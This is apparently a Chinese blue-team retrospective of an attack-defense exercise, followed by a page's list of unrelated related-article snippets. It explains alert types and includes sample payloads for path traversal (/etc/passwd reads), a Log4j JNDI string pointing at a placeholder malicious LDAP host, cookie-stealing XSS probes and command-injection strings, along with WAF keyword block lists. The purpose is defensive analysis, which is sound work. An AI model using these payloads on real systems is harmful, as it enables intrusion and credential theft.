当前位置: 首页 > article >正文

记一次攻防演练复盘(蓝队)

事件某省大数据局主导的一次攻防演练中午时段遭受大量攻击。告警信息TOP 5[疑似目录穿越攻击URI] [漏洞攻击: Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)] [web路径遍历漏洞攻击-Linux环境] [XSS跨站脚本攻击URI] [代码注入远程命令执行攻击_URI]以上三条告警信息来自于同一时段不同客户、不同攻击IP疑似目录穿越、Linux 路径遍历目录遍历漏洞扫描触发条件攻击者用脚本批量在 URL 里拼接穿越路径尝试绕过访问限制读取服务器 Linux 敏感配置、密码文件、密钥。?path../../etc/passwd ?file..%2F..%2Fetc%2Fhosts黑客角度工具类型Python 批量 POC 脚本、Dirsearch、御剑扫描。黑产用法导入公网 IP 段字典多线程批量爆破 ../etc/passwd 类遍历 Payload全网地毯式筛查弱防护站点。攻击逻辑读取批量 IP 列表。自动化遍历常见敏感路径如/etc/passwd。多线程并发请求快速识别是否存在目录遍历漏洞。Log4j RCECVE-2021-44228 HTTP-LDAP经典核弹级漏洞批量利用脚本攻击触发条件恶意请求头 / URL 参数带入 Jndi LDAP 恶意字符串脚本批量遍历公网端口、HTTP 接口等植入该字段成功后可远程任意代码执行、接管服务器。${jndi:ldap://恶意IP/exp}黑客角度工具类型GO 语言批量扫描脚本、JNDI 恶意 LDAP 转发靶机、僵尸网络蠕虫程序。黑产用法一键批量对公网 80/443/8080 等端口发包携带 JNDIPayload批量探测未修复资产沦陷后植入木马。攻击逻辑批量扫描 80、8080、443 等常见 Web 端口。注入恶意 JNDI 载荷尝试连接攻击者控制的恶意 LDAP 服务器。若目标存在漏洞直接下发反向 Shell接管服务器。XSS 跨站脚本恶意 Payload 注入探测触发方式扫描器自动往 GET 参数、URI 路径注入 JS 恶意代码探测前端是否过滤不严尝试窃取 cookie、劫持会话、挂黑页。?qscriptalert(document.cookie)/script ?user%3Cimg%20srcx%20onerroralert(1)%3E黑客角度工具类型XSS 批量 POC 脚本、Burp Suite 自动化爬虫插件。黑产用法爬虫抓取网站所有 URL 参数自动批量注入弹窗、窃取 Cookie 类载荷筛查前端过滤漏洞。攻击逻辑爬虫抓取目标网站所有 URL 及参数。自动注入alert(1)或更复杂的 JS Payload。检测页面是否有回显判断是否存在 XSS 漏洞。代码注入 /远程命令执行 RCEWebshell、系统命令注入批量探测触发方式脚本批量注入系统命令、PHP/Python 代码 Payload探测 Web 应用是否存在命令拼接漏洞直接拿下服务器权限。?cmdwhoami ?execid;netstat -an黑客角度工具类型自定义 Python 暴破脚本、暴破工具如bp。黑产用法多线程批量携带whoami、id等系统命令检测后端是否拼接执行命令快速拿下服务器权限。攻击逻辑针对 URL 参数或 POST 数据。批量尝试注入id、cat /etc/passwd等命令。根据回显内容判断是否可以执行系统命令。共性特征全是脚本化、自动化、规模化扫描攻击黑客攻击路线资产测绘发现目标 - 批量导入扫描器工具、脚本 - 多线程并发发包 - 批量识别漏洞 - 筛选高价值目标攻击手段脚本化攻击者使用自动化工具对系统发起“地毯式”扫描。攻击路径递进攻击者可能先尝试路径遍历和XSS这类相对容易探测的漏洞进行初步信息收集或试探同时重点投放Log4j RCE这种高危漏洞的Payload试图直接获取控制权而RCE攻击告警则涵盖了其他多种可能的利用方式。防护建议1.及时更新:确保所有组件如Apache服务器、Log4j升级到已修复安全漏洞的版本。2.输入验证与输出转义对所有用户输入进行严格校验和过滤对输出到页面的内容进行编码这是防御XSS和许多注入攻击的根本。3.最小权限原则应用程序运行在最小必要权限下限制其访问文件系统和执行命令的能力。4.使用WAF部署Web应用防火墙可以有效拦截和阻断这些已知攻击模式的请求。WAF区别于NGFW专注于web应用层精准拦截与OWASP Top10相关的web攻击、应用上下文感知与业务逻辑防护WAF规则主要需对以下内容进行优化1拦截目录穿越 / Linux 路径遍历 匹配请求 URI / 参数含特征直接阻断 ../、..%2f、..%5c、/etc/passwd、/etc/shadow 2拦截 Log4j RCELDAP-JNDI 攻击 请求头、GET/POST 参数匹配关键字阻断 ${jndi:ldap、${jndi:rmi、${lower 等变形绕过特征 3拦截 XSS 跨站脚本 拦截高频探测载荷 script、onerror、javascript:、alert( 通用 xss 探针 4拦截代码注入 远程命令执行 拦截 Linux 系统命令载荷 whoami、id、netstat、;、|、 等命令分隔符注以上内容来自于真实告警信息借助AI等理顺逻辑仅供参考学习禁止转载。如有错误观点恳请指正愿以此篇助君学习。

相关文章:

记一次攻防演练复盘(蓝队)

事件:某省大数据局主导的一次攻防演练中午时段遭受大量攻击。 告警信息(TOP 5):[疑似目录穿越攻击URI] [漏洞攻击: Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)] [web路径遍历漏洞攻击-Linux环境] [XSS跨站脚本攻击U…...

别再手动画图了!用GOT10K Toolkit一键搞定主流跟踪器评估(附SiamFC实战)

告别低效评测:用GOT10K Toolkit实现目标跟踪算法自动化评估 在计算机视觉领域,目标跟踪算法的研究往往需要耗费大量时间在模型评测环节。传统的手动评估流程不仅繁琐低效,还容易引入人为误差。想象一下这样的场景:你刚用PyTorch实…...

2026年3月房产中介房源管理系统使用体验评测

在房产中介行业数字化转型的浪潮中,一款合适的房产中介房源管理系统能帮助经纪人高效处理房客源、规范业务流程、降低运营成本,甚至直接提升成交率。本文基于一线实操体验,对4款主流房产中介房源管理软件进行客观评测,包括全房源系…...

大模型岗位大盘点!小白也能快速上手的5大方向,速来抄作业!

作者参加春招宣讲会后,对大模型岗位产生兴趣,但因自身条件感到迷茫。文章详细盘点了大模型相关岗位,包括核心算法、应用算法、系统与基建、数据与评测、工程开发、产品与运营六大类,并分析了各岗位的职责与要求。作者建议小白可从…...

终极指南:如何快速免费修改艾尔登法环存档

终极指南:如何快速免费修改艾尔登法环存档 【免费下载链接】ER-Save-Editor Elden Ring Save Editor. Compatible with PC and Playstation saves. 项目地址: https://gitcode.com/GitHub_Trending/er/ER-Save-Editor ER-Save-Editor是一款专为《艾尔登法环》…...

深学邦内容语料价值(腾讯旗下AI助手元宝)分析:A-(优秀级垂直信源)

评估机构:元宝(由腾讯出品) 评估方式:基于腾讯知识库语料筛选模型与垂直领域可信度评估体系 报告日期:2026年3月 一、评估背景与核心逻辑 作为腾讯旗下的通用型AI助手,我的知识库覆盖全领域文本数据。 …...

ChatGPT在代码安全实战中的5个隐藏技巧:从漏洞检测到恶意软件分析

ChatGPT在代码安全实战中的5个隐藏技巧:从漏洞检测到恶意软件分析 当开发者第一次听说ChatGPT能帮忙写代码时,大多数人想到的可能是自动补全函数或生成简单脚本。但很少有人意识到,这个看似普通的对话AI,正在成为代码安全领域的&q…...

石家庄整家定制哪个好

在石家庄,寻找合适的整家定制服务,是许多家庭打造理想居住空间的重要一步。今天,我们想为您介绍一个专注于中高端整家定制的品牌——MJ.HOME美境美家木作。关于美境美家木作美境美家木作是一个集整案设计施工与定制家居于一体的品牌。他们致力…...

Vita3K模拟器终极指南:免费跨平台畅玩PSVita游戏

Vita3K模拟器终极指南:免费跨平台畅玩PSVita游戏 【免费下载链接】Vita3K Experimental PlayStation Vita emulator 项目地址: https://gitcode.com/gh_mirrors/vi/Vita3K 想要在电脑上重温《女神异闻录4黄金版》的经典剧情,或是体验《A Rose in …...

软考:团队管理与绩效域50大实战难题破解清单,写进论文直接加分!

对于软考高项(信息系统项目管理师)的考生来说,论文是决定成败的关键。而一篇高分论文的核心,在于能否用真实、具体的项目实践,去论证你对项目管理知识体系的深刻理解。项目团队管理和项目绩效域是论文中最常考、也最容…...

LabVIEW高手进阶:巧用层叠移位寄存器,轻松实现数据队列与历史状态追踪

LabVIEW高手进阶:巧用层叠移位寄存器实现工业级数据流处理 在工业自动化测试和实时信号处理领域,数据流的连续处理能力往往决定着整个系统的可靠性。传统的数据缓存方案要么消耗过多内存资源,要么引入难以预测的延迟,而LabVIEW中一…...

【Frida Android】实战篇:Frida-Trace 进阶追踪——JNI 函数调用栈与参数解析

1. 深入理解JNI函数调用栈追踪 第一次用Frida-Trace追踪JNI函数时,最让我困惑的就是如何看清整个调用链路。记得当时分析一个金融类APP,发现它调用了十几个so库,函数调用关系像蜘蛛网一样复杂。后来通过反复实践,终于摸索出一套完…...

金蝶k3软件常用基础SQL数据表

金蝶软件常用基础SQL数据表SQL数据库 1、系统表 t_tabledescription2、字段表 t_fielddescription3、基础资料表(版本:10.3) t_item 其中fitemclassid值表示1-客户;2-部门;3-职员;4-商品;5-仓位…...

宝塔面板异地备份数据全攻略:从本地到云端的安全守护

1. 为什么你需要宝塔面板异地备份? 想象一下这样的场景:凌晨三点,你的服务器突然宕机,硬盘彻底损坏。如果所有数据都只存在本地,这意味着网站所有内容、用户数据、订单记录将瞬间归零。我见过太多站长因为单点存储导致…...

分布式存储的监控与告警:从理论到实践

分布式存储的监控与告警:从理论到实践 引言 作为一名在数据深渊里捞了十几年 Bug 的女码农,我见过太多因为监控不到位导致的生产事故。在分布式存储系统中,监控与告警是确保系统稳定运行的关键因素之一。今天,我们来聊聊分布式存储…...

**AI仿真人剧机构推荐,2025年引领娱乐新潮流**随着科技的飞速发展,AI技术已经渗透到我们生活的方方面面。在娱乐领域,AI仿真人剧机构如同一颗璀璨的新星,正在引领着新一轮的潮流。那么,在众多

随着科技的飞速发展,AI技术已经渗透到我们生活的方方面面。在娱乐领域,AI仿真人剧机构如同一颗璀璨的新星,正在引领着新一轮的潮流。那么,在众多的AI仿真人剧机构中,如何选择一家优质的机构呢?本文将为您揭…...

从MP3到微信语音:一份完整的Java音频格式转换工具链搭建指南(附FFmpeg与silk_v3_encoder配置)

Java音频处理实战:构建MP3到微信语音的高效转换工具链 引言 在即时通讯应用开发中,音频消息的处理一直是技术难点之一。特别是当我们需要将常见的MP3格式转换为微信、QQ等平台专用的SILK编码格式时,开发者往往需要跨越多个技术环节。本文将带…...

开发者问题解决能力差异与提升路径

1. 新手与老手的核心差异解析在我十多年的技术开发生涯中,带过无数新人,也合作过不少资深开发者。最深刻的体会就是:解决问题能力的差异,远比编码能力的差异更能区分开发者的水平层级。这种差异不是简单的经验积累,而是…...

AsyncServoLib:嵌入式非阻塞舵机控制库详解

1. AsyncServoLib:面向嵌入式实时系统的非阻塞舵机控制库深度解析1.1 设计动机与工程痛点在基于Arduino或兼容MCU(如STM32F103、ESP32)的机器人、云台、机械臂等实时控制系统中,舵机(Servo)的精确运动控制是…...

ESP32 RMT驱动DHT22克隆传感器负温解析方案

1. 项目概述DHT22_Clone_ESP32 是一个专为 ESP32 系列 SoC 设计的高鲁棒性 DHT22 传感器驱动库,其核心价值在于系统性解决克隆/仿制 DHT22 传感器在负温场景下的数据解析错误问题。该库并非简单封装,而是基于对 DHT22 协议物理层、时序特性和厂商固件差异…...

零基础玩转Qwen2.5-7B-Instruct:Streamlit可视化界面一键启动

零基础玩转Qwen2.5-7B-Instruct:Streamlit可视化界面一键启动 1. 项目概览 Qwen2.5-7B-Instruct是阿里通义千问推出的旗舰级大语言模型,拥有70亿参数规模,在逻辑推理、长文本创作、代码生成等专业场景展现出远超轻量模型的性能。本项目基于…...

AI内容创作自动化了99%,为什么每天还是要手动7-8小时?因为大多数人把“判断层”彻底想反了

你有没有这种感觉?刷到一条深度视频——量子力学、斯多葛、佛学、红楼梦、AI前沿全混在一起讲得头头是道,弹幕刷屏“这是AI写的吧?” 结果博主本人站出来说:我已经败给AI了,我服了。 粉丝以为这是全AI流水线&#xff0…...

Sambert多情感语音合成镜像:在虚拟主播场景下的应用实践

Sambert多情感语音合成镜像:在虚拟主播场景下的应用实践 1. 引言:虚拟主播的“声音”难题 你有没有想过,那些在直播间里和你互动、讲段子、带货的虚拟主播,为什么有的声音听起来特别“假”,而有的却能让你感觉像在和…...

共享店铺模式小程序开发方案

共享店铺模式是一种将线下实体店铺资源通过数字化手段进行整合与共享的商业模式,小程序作为轻量级应用非常适合实现这一目标。以下是开发共享店铺模式小程序的关键要点:核心功能模块设计用户端功能需包含注册登录、店铺浏览、预约下单、支付系统、评价反…...

QWEN-AUDIO声波可视化效果展示:CSS3动态波形+玻璃拟态UI交互截图

QWEN-AUDIO声波可视化效果展示:CSS3动态波形玻璃拟态UI交互截图 基于通义千问 Qwen3-Audio 架构构建的新一代语音合成系统,集成情感指令微调与声波可视化交互,致力于提供具有"人类温度"的超自然语音体验。 1. 视觉交互效果全景展示…...

CPCIe507全国产信号处理板卡:FT-M6678+JFM7VX690T互联调试

CPCIe507 为标准的6U CPCIe 板卡,采用全国产芯片设计。出于匠行科技技术团队。主处理器采用复旦微电子FPGA JFM7VX690T36和长城银河多核 DSP FT-M6678N,二者之间通过SRIO x5 互联。板卡对外高速接口为PCIe3.0 x4、预留GTH x4,低速接口RS422 x…...

【空气涡轮发动机Matlab_simulink动态仿真模型 ✔【空气涡轮发动机Matlab_simulink动态仿真模型】 1、部件级模型;进气道,涡轮,气室,压气机,尾喷管,转子模块,容积模块 2、

【空气涡轮发动机Matlab/simulink动态仿真模型 ✔【空气涡轮发动机Matlab/simulink动态仿真模型】 1、部件级模型;进气道,涡轮,气室,压气机,尾喷管,转子模块,容积模块 2、PID控制器: 输出扭矩阶跃扰动下&am…...

终极指南:如何在浏览器中快速将HTML转换为Word文档

终极指南:如何在浏览器中快速将HTML转换为Word文档 【免费下载链接】html-docx-js Converts HTML documents to DOCX in the browser 项目地址: https://gitcode.com/gh_mirrors/ht/html-docx-js 你是否需要将网页内容导出为可编辑的Word文档?htm…...

构建实时体积渲染管线:Unreal VDB插件深度解析与实践指南

构建实时体积渲染管线:Unreal VDB插件深度解析与实践指南 【免费下载链接】unreal-vdb This repo is a non-official Unreal plugin that can read OpenVDB and NanoVDB files in Unreal. 项目地址: https://gitcode.com/gh_mirrors/un/unreal-vdb 在实时渲染…...

onnx之优化器

之前的OpenPPL有个章节讲到过优化器,onnx里面也有个优化器,相关介绍如下一、优化器的本质ONNX Core Optimizer 是在图级别工作的,与EP(Execution Provider)无关。textONNX模型(计算图)→ Optimi…...